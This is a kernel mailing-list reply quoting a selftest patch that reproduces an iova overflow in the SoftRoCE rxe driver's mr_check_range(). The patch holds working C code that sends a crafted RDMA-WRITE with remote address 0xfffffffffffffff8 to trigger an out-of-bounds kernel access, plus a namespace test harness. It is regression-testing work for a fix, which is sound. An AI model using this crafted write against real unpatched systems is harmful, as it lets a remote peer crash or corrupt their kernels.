Re: [PATCH net 2/2] DO-NOT-MERGE: selftest: add rxe mr_check_range() overflow reproducer

Zhu Yanjun <[email protected]> Sun, 2 Aug 2026 15:09:34 -0700
Newsgroups org.kernel.vger.linux-rdma
Message-ID <[email protected]>
在 2026/7/28 2:11, Gang Yan 写道:
> From: Gang Yan <[email protected]>
> 
> This patch is for reproduce the OOB issue.
> 
> Requirements:
> * Kernel built with ``CONFIG_INFINIBAND``, ``CONFIG_INFINIBAND_USER_ACCESS``
>    and ``CONFIG_RDMA_RXE`` (=m is fine).
> * ``rdma_rxe`` module loadable (``modprobe rdma_rxe``).
> * Userspace headers/libs to build the helper: ``libibverbs-dev``,
>    ``librdmacm-dev``.
> * Root (the script builds a network namespace, a veth pair and two rxe
>    devices).
> 
> BUILD and RUN:
>      cd tools/testing/selftests/rdma
>      make
>      # as root:
>      ./rxe_mr_overflow.sh
> 
> Expected results (Unpatched kernel (bug present) — FAIL):
> The kernel log shows the index WARNING immediately followed by an OOB Oops
> in the responder path::
> 
>      WARNING: CPU: N PID: ... at rxe_mr_iova_to_index+0x.../0x... [rdma_rxe]
>      ...
>      RIP: 0010:rxe_mr_iova_to_index+0x.../0x... [rdma_rxe]
>      Call Trace:
>       <TASK>
>       rxe_mr_copy+0x.../0x... [rdma_rxe]
>       rxe_receiver+0x.../0x... [rdma_rxe]
>       do_work+0x.../0x... [rdma_rxe]
>       ...
>      Oops: general protection fault, probably for non-canonical address 0x...
>      Workqueue: rxe_wq do_work [rdma_rxe]
>      RIP: 0010:rxe_mr_copy+0x.../0x... [rdma_rxe]
>      Call Trace:
>       <TASK>
>       rxe_mr_copy+0x.../0x... [rdma_rxe]
>       rxe_receiver+0x.../0x... [rdma_rxe]
>       do_work+0x.../0x... [rdma_rxe]
> 
> Assisted-by: Codex: GLM-5.2
> Signed-off-by: Gang Yan <[email protected]>
> ---
>   tools/testing/selftests/rdma/Makefile         |   8 +-
>   tools/testing/selftests/rdma/config           |   2 +
>   .../testing/selftests/rdma/rxe_mr_overflow.c  | 187 ++++++++++++++++++
>   .../testing/selftests/rdma/rxe_mr_overflow.sh | 132 +++++++++++++
>   4 files changed, 328 insertions(+), 1 deletion(-)
>   create mode 100644 tools/testing/selftests/rdma/rxe_mr_overflow.c
>   create mode 100644 tools/testing/selftests/rdma/rxe_mr_overflow.sh
> 
> diff --git a/tools/testing/selftests/rdma/Makefile b/tools/testing/selftests/rdma/Makefile
> index 07af7f15c1bf..effeb8121d41 100644
> --- a/tools/testing/selftests/rdma/Makefile
> +++ b/tools/testing/selftests/rdma/Makefile
> @@ -1,8 +1,14 @@
>   # SPDX-License-Identifier: GPL-2.0
> -TEST_PROGS := rxe_rping_between_netns.sh \
> +TEST_GEN_FILES := rxe_mr_overflow
> +TEST_PROGS := rxe_mr_overflow.sh \
> +		rxe_rping_between_netns.sh \
>   		rxe_ipv6.sh \
>   		rxe_socket_with_netns.sh \
>   		rxe_test_NETDEV_UNREGISTER.sh \
>   		rxe_sent_rcvd_bytes.sh
>   
>   include ../lib.mk
> +
> +# rxe_mr_overflow uses libibverbs / librdmacm
> +$(OUTPUT)/rxe_mr_overflow: CFLAGS += -O2 -Wall
> +$(OUTPUT)/rxe_mr_overflow: LDLIBS += -libverbs -lrdmacm
> diff --git a/tools/testing/selftests/rdma/config b/tools/testing/selftests/rdma/config
> index 4ffb814e253b..bc27ce3ec093 100644
> --- a/tools/testing/selftests/rdma/config
> +++ b/tools/testing/selftests/rdma/config
> @@ -1,3 +1,5 @@
>   CONFIG_TUN
>   CONFIG_VETH
>   CONFIG_RDMA_RXE
> +CONFIG_INFINIBAND
> +CONFIG_INFINIBAND_USER_ACCESS
> diff --git a/tools/testing/selftests/rdma/rxe_mr_overflow.c b/tools/testing/selftests/rdma/rxe_mr_overflow.c
> new file mode 100644
> index 000000000000..ccad930533ac
> --- /dev/null
> +++ b/tools/testing/selftests/rdma/rxe_mr_overflow.c
> @@ -0,0 +1,187 @@
> +// SPDX-License-Identifier: GPL-2.0
> +/*
> + * rxe_mr_overflow.c - trigger mr_check_range() iova overflow (OOB)
> + *
> + * Companion to rxe_mr_overflow.sh. The server registers a USER/MEM_REG MR
> + * and accepts an RDMA_CM connection, passing its rkey via private data. The
> + * client posts a single RDMA-WRITE whose remote_addr is chosen so that
> + * iova + length wraps to 0 in mr_check_range():
> + *
> + *     iova + length = 0xfffffffffffffff8 + 8 = 2^64 = 0
> + *
> + * On an *unpatched* kernel this bypasses mr_check_range(), and the responder
> + * computes a huge index in rxe_mr_iova_to_index() (WARN_ON(idx >= nbuf)) and
> + * dereferences mr->page_info[huge] -> out-of-bounds access / oops.
> + *
> + * On a *patched* kernel mr_check_range() rejects the crafted iova and the
> + * client completion is IBV_WC_REM_ACCESS_ERR (remote access error).
> + *
> + * Build: see Makefile (needs libibverbs-dev / librdmacm-dev).
> + */
> +#include <stdio.h>
> +#include <stdlib.h>
> +#include <string.h>
> +#include <unistd.h>
> +#include <stdint.h>
> +#include <arpa/inet.h>
> +#include <infiniband/verbs.h>
> +#include <rdma/rdma_cma.h>
> +
> +#define BAD_ADDR	0xfffffffffffffff8ULL	/* iova + WR_LEN wraps to 0 */
> +#define WR_LEN		8
> +#define MR_LEN		4096
> +
> +struct mr_info {
> +	uint32_t rkey;
> +	uint32_t pad;
> +	uint64_t iova;
> +} __attribute__((packed));
> +
> +static int wait_ev(struct rdma_event_channel *ec, struct rdma_cm_event **ev,
> +		   enum rdma_cm_event_type want)
> +{
> +	while (rdma_get_cm_event(ec, ev) == 0) {
> +		if ((*ev)->event != want) {
> +			fprintf(stderr, "unexpected event %s (want %s)\n",
> +				rdma_event_str((*ev)->event), rdma_event_str(want));
> +			rdma_ack_cm_event(*ev);
> +			return -1;
> +		}
> +		return 0;
> +	}
> +	perror("rdma_get_cm_event");
> +	return -1;
> +}
> +
> +static int run_server(const char *ip, int port)
> +{
> +	struct rdma_event_channel *ec = rdma_create_event_channel();
> +	struct rdma_cm_id *lid;
> +	struct rdma_cm_event *ev;
> +
> +	if (!ec) { perror("event_channel"); return 1; }
> +	if (rdma_create_id(ec, &lid, NULL, RDMA_PS_TCP)) { perror("create_id"); return 1; }
> +
> +	struct sockaddr_in sin = {0};
> +	sin.sin_family = AF_INET;
> +	sin.sin_port = htons(port);
> +	if (!inet_pton(AF_INET, ip, &sin.sin_addr)) { fprintf(stderr, "bad ip\n"); return 1; }
> +
> +	if (rdma_bind_addr(lid, (struct sockaddr *)&sin)) { perror("bind_addr"); return 1; }
> +	if (rdma_listen(lid, 1)) { perror("listen"); return 1; }
> +	printf("[server] listen %s:%d dev=%s\n", ip, port,
> +		lid->verbs ? ibv_get_device_name(lid->verbs->device) : "?");
> +	fflush(stdout);
> +
> +	if (wait_ev(ec, &ev, RDMA_CM_EVENT_CONNECT_REQUEST)) return 1;
> +	struct rdma_cm_id *id = ev->id;
> +
> +	struct ibv_pd *pd = ibv_alloc_pd(id->verbs);
> +	struct ibv_cq *cq = ibv_create_cq(id->verbs, 8, NULL, NULL, 0);
> +	if (!pd || !cq) { perror("alloc_pd/create_cq"); return 1; }
> +	void *buf = calloc(1, MR_LEN);
> +	struct ibv_mr *mr = ibv_reg_mr(pd, buf, MR_LEN,
> +		IBV_ACCESS_LOCAL_WRITE | IBV_ACCESS_REMOTE_WRITE);
> +	if (!mr) { perror("reg_mr"); return 1; }
> +
> +	struct ibv_qp_init_attr qa = {0};
> +	qa.send_cq = cq; qa.recv_cq = cq; qa.qp_type = IBV_QPT_RC;
> +	qa.cap.max_send_wr = 4; qa.cap.max_recv_wr = 4;
> +	qa.cap.max_send_sge = 2; qa.cap.max_recv_sge = 2;
> +	if (rdma_create_qp(id, pd, &qa)) { perror("create_qp"); return 1; }
> +
> +	struct mr_info info = { .rkey = mr->rkey, .iova = (uint64_t)(uintptr_t)buf };
> +	struct rdma_conn_param p = {0};
> +	p.private_data = &info;
> +	p.private_data_len = sizeof(info);
> +	p.initiator_depth = 1;
> +	p.responder_resources = 1;
> +	if (rdma_accept(id, &p)) { perror("accept"); return 1; }
> +	rdma_ack_cm_event(ev);
> +	printf("[server] accepted rkey=%#x iova=%#llx; waiting for client write\n",
> +		mr->rkey, (unsigned long long)info.iova);
> +	fflush(stdout);
> +
> +	/* The OOB (if unpatched) fires here in the responder path. */
> +	sleep(5);
> +	return 0;
> +}
> +
> +static int run_client(const char *ip, int port)
> +{
> +	struct rdma_event_channel *ec = rdma_create_event_channel();
> +	struct rdma_cm_id *id;
> +	struct rdma_cm_event *ev;
> +
> +	if (!ec) { perror("event_channel"); return 1; }
> +	if (rdma_create_id(ec, &id, NULL, RDMA_PS_TCP)) { perror("create_id"); return 1; }
> +
> +	struct sockaddr_in sin = {0};
> +	sin.sin_family = AF_INET; sin.sin_port = htons(port);
> +	if (!inet_pton(AF_INET, ip, &sin.sin_addr)) { fprintf(stderr, "bad ip\n"); return 1; }
> +
> +	if (rdma_resolve_addr(id, NULL, (struct sockaddr *)&sin, 5000)) { perror("resolve_addr"); return 1; }
> +	if (wait_ev(ec, &ev, RDMA_CM_EVENT_ADDR_RESOLVED)) return 1;
> +	rdma_ack_cm_event(ev);
> +	if (rdma_resolve_route(id, 5000)) { perror("resolve_route"); return 1; }
> +	if (wait_ev(ec, &ev, RDMA_CM_EVENT_ROUTE_RESOLVED)) return 1;
> +	rdma_ack_cm_event(ev);
> +
> +	struct ibv_pd *pd = ibv_alloc_pd(id->verbs);
> +	struct ibv_cq *cq = ibv_create_cq(id->verbs, 8, NULL, NULL, 0);
> +	void *buf = calloc(1, MR_LEN);
> +	struct ibv_mr *mr = ibv_reg_mr(pd, buf, MR_LEN, IBV_ACCESS_LOCAL_WRITE);
> +	struct ibv_qp_init_attr qa = {0};
> +	qa.send_cq = cq; qa.recv_cq = cq; qa.qp_type = IBV_QPT_RC;
> +	qa.cap.max_send_wr = 4; qa.cap.max_recv_wr = 4;
> +	qa.cap.max_send_sge = 2; qa.cap.max_recv_sge = 2;
> +	if (rdma_create_qp(id, pd, &qa)) { perror("create_qp"); return 1; }
> +
> +	struct rdma_conn_param p = {0};
> +	p.initiator_depth = 1; p.responder_resources = 1; p.retry_count = 3;
> +	if (rdma_connect(id, &p)) { perror("connect"); return 1; }
> +	if (wait_ev(ec, &ev, RDMA_CM_EVENT_ESTABLISHED)) return 1;
> +
> +	struct mr_info info = {0};
> +	if (ev->param.conn.private_data_len >= (int)sizeof(info))
> +		memcpy(&info, ev->param.conn.private_data, sizeof(info));
> +	rdma_ack_cm_event(ev);
> +
> +	/* The malicious RDMA-WRITE: remote_addr makes iova+length wrap. */
> +	struct ibv_sge sge = { .addr = (uintptr_t)buf, .length = WR_LEN, .lkey = mr->lkey };
> +	struct ibv_send_wr wr = {0}, *bad;
> +	wr.wr_id = 0xdead;
> +	wr.opcode = IBV_WR_RDMA_WRITE;
> +	wr.send_flags = IBV_SEND_SIGNALED;
> +	wr.sg_list = &sge;
> +	wr.num_sge = 1;
> +	wr.wr.rdma.remote_addr = BAD_ADDR;
> +	wr.wr.rdma.rkey = info.rkey;
> +	printf("[client] post RDMA-WRITE remote_addr=%#llx len=%d rkey=%#x\n",
> +		(unsigned long long)BAD_ADDR, WR_LEN, info.rkey);
> +	fflush(stdout);
> +	ibv_post_send(id->qp, &wr, &bad);
> +
> +	struct ibv_wc wc;
> +	int n, tries = 5000;
> +	while (tries-- > 0 && (n = ibv_poll_cq(cq, 1, &wc)) == 0)
> +		usleep(1000);
> +	if (n > 0)
> +		printf("[client] completion status=%d (%s)\n",
> +			wc.status, ibv_wc_status_str(wc.status));
> +	else
> +		printf("[client] no completion (responder likely crashed)\n");
> +	sleep(2);
> +	return 0;
> +}
> +
> +int main(int argc, char **argv)
> +{
> +	if (argc == 3)			/* server <ip> <port> */
> +		return run_server(argv[1], atoi(argv[2]));
> +	if (argc == 4 && !strcmp(argv[1], "-c"))	/* -c <ip> <port> */
> +		return run_client(argv[2], atoi(argv[3]));
> +	fprintf(stderr, "Usage:\n  server: %s <ip> <port>\n  client: %s -c <ip> <port>\n",
> +		argv[0], argv[0]);
> +	return 1;
> +}
> diff --git a/tools/testing/selftests/rdma/rxe_mr_overflow.sh b/tools/testing/selftests/rdma/rxe_mr_overflow.sh
> new file mode 100644
> index 000000000000..2590e41be99b
> --- /dev/null
> +++ b/tools/testing/selftests/rdma/rxe_mr_overflow.sh
> @@ -0,0 +1,132 @@
> +#!/bin/bash
> +# SPDX-License-Identifier: GPL-2.0
> +#
> +# Regression test for the mr_check_range() iova overflow in SoftRoCE (rxe).
> +#
> +# A remote peer can craft an RDMA-WRITE whose RETH makes iova + length wrap
> +# to 0, bypassing the old
> +#
> +#	if (iova + length > mr->ibmr.iova + mr->ibmr.length)
> +#
> +# range check in mr_check_range(). The responder then derives a huge page
> +# index in rxe_mr_iova_to_index() (only WARN_ON-guarded) and dereferences
> +# mr->page_info[huge] -> out-of-bounds read/write / kernel oops, triggerable
> +# by an unauthenticated remote peer.
> +#
> +# Fixed by rewriting the check in overflow-safe form:
> +#
> +#	if (iova < mr->ibmr.iova ||
> +#	    length > mr->ibmr.length ||
> +#	    iova - mr->ibmr.iova > mr->ibmr.length - length)
> +#
> +# Topology: a veth pair across a network namespace, one rxe device on each
> +# end. The server (ns) registers a USER MR and accepts an RDMA_CM
> +# connection, passing its rkey/iova in the private data. The client (host)
> +# posts one RDMA-WRITE with remote_addr = 0xfffffffffffffff8, len = 8.
> +#
> +#   - Patched kernel:   PASS  (mr_check_range() rejects the crafted iova;
> +#                              the client completion is IBV_WC_REM_ACCESS_ERR;
> +#                              no kernel warning/oops in dmesg)
> +#   - Unpatched kernel: FAIL  (WARN_ON in rxe_mr_iova_to_index followed by
> +#                              an OOB page fault / oops in rxe_mr_copy)
> +
Thanks a lot. When I run rdma selftests. I got the following:
"
# Warning: file rxe_mr_overflow.sh is not executable
"
You need to make rxe_mr_overflow.sh executable.

And please also check and try to fix some warnings from sashiko.

Thanks a lot.
Zhu Yanjun

> +NS="rxe_mrovf"
> +VETH_NS="vmo-a"
> +VETH_HOST="vmo-b"
> +IP_NS="1.1.1.1"
> +IP_HOST="1.1.1.2"
> +PORT=4792
> +BIN="$(dirname "$(readlink -f "$0")")/rxe_mr_overflow"
> +
> +source "$(dirname "$0")/../kselftest/ktap_helpers.sh"
> +
> +SRV=
> +
> +# Remove the topology this script creates. Idempotent: safe to call even when
> +# some of the resources no longer exist (e.g. partial setup, prior abort).
> +rxe_teardown() {
> +	rdma link del rxe1 2>/dev/null
> +	ip netns exec "$NS" rdma link del rxe0 2>/dev/null
> +	ip link delete "$VETH_HOST" 2>/dev/null
> +	ip netns del "$NS" 2>/dev/null
> +}
> +
> +cleanup() {
> +	trap '' INT TERM EXIT		# guard against re-entry
> +	# Kill the server first so the client does not block on a dead peer.
> +	[ -n "$SRV" ] && kill "$SRV" 2>/dev/null
> +	wait "$SRV" 2>/dev/null
> +	rxe_teardown
> +	modprobe -r rdma_rxe 2>/dev/null
> +}
> +# Cover normal exit, Ctrl+C (SIGINT) and kill (SIGTERM) alike.
> +trap cleanup INT TERM EXIT
> +
> +# Tear down any leftover topology from a previous aborted run (SIGINT, kill
> +# -9, guest crash, ...) so this script is always re-runnable instead of
> +# failing on "RTNETLINK answers: File exists".
> +rxe_teardown
> +
> +# --- Prerequisites ---
> +if [ "$EUID" -ne 0 ]; then
> +	ktap_print_header
> +	ktap_skip_all "needs root"
> +	exit "$KSFT_SKIP"
> +fi
> +if ! modinfo rdma_rxe >/dev/null 2>&1; then
> +	ktap_print_header
> +	ktap_skip_all "rdma_rxe module not found"
> +	exit "$KSFT_SKIP"
> +fi
> +if [ ! -x "$BIN" ]; then
> +	ktap_print_header
> +	ktap_skip_all "$BIN not built (needs libibverbs-dev / librdmacm-dev)"
> +	exit "$KSFT_SKIP"
> +fi
> +
> +modprobe rdma_rxe >/dev/null 2>&1
> +
> +# --- Topology: veth pair across a netns, one rxe device on each end ---
> +ip netns add "$NS"
> +ip link add "$VETH_NS" type veth peer name "$VETH_HOST"
> +ip link set "$VETH_NS" netns "$NS"
> +
> +ip netns exec "$NS" ip addr add "$IP_NS/24" dev "$VETH_NS"
> +ip netns exec "$NS" ip link set "$VETH_NS" up
> +ip netns exec "$NS" ip link set lo up
> +ip addr add "$IP_HOST/24" dev "$VETH_HOST"
> +ip link set "$VETH_HOST" up
> +
> +ip netns exec "$NS" rdma link add rxe0 type rxe netdev "$VETH_NS"
> +rdma link add rxe1 type rxe netdev "$VETH_HOST"
> +
> +if ! ping -c 2 -W 1 "$IP_NS" >/dev/null 2>&1; then
> +	ktap_print_header
> +	ktap_skip_all "no connectivity between host and netns"
> +	exit "$KSFT_SKIP"
> +fi
> +
> +# Only look at warnings produced by this run.
> +dmesg -C >/dev/null 2>&1
> +
> +# --- Run: server in the netns, client on the host ---
> +# On an unpatched kernel the crafted WRITE can wedge the responder; wrap both
> +# sides in timeout() so the script always reaches a verdict and runs cleanup
> +# instead of hanging on a stuck peer.
> +ktap_print_header
> +ktap_set_plan 1
> +
> +ip netns exec "$NS" timeout 30 "$BIN" "$IP_NS" "$PORT" >/dev/null 2>&1 &
> +SRV=$!
> +sleep 2
> +timeout 30 "$BIN" -c "$IP_NS" "$PORT" >/dev/null 2>&1
> +wait "$SRV" 2>/dev/null
> +
> +# --- Verdict: any rxe MR-range warning / OOB means the kernel is unpatched ---
> +if dmesg 2>/dev/null | grep -qE "rxe_mr_iova_to_index|mr_check_range|BUG:.*rxe_mr_copy|KASAN:.*rxe_mr"; then
> +	ktap_test_fail "mr_check_range() iova overflow (UNPATCHED): OOB/WARN in dmesg"
> +else
> +	ktap_test_pass "mr_check_range() rejected crafted iova (patched)"
> +fi
> +
> +ktap_finished